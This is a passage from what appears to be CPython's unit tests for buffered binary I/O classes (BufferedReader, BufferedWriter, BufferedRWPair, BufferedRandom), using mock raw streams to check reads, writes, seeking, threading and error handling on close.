def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading differently, so
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends up in gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After the write, write_pos and write_end are set to 0
f.read(1)
# The read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends up in gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream; otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
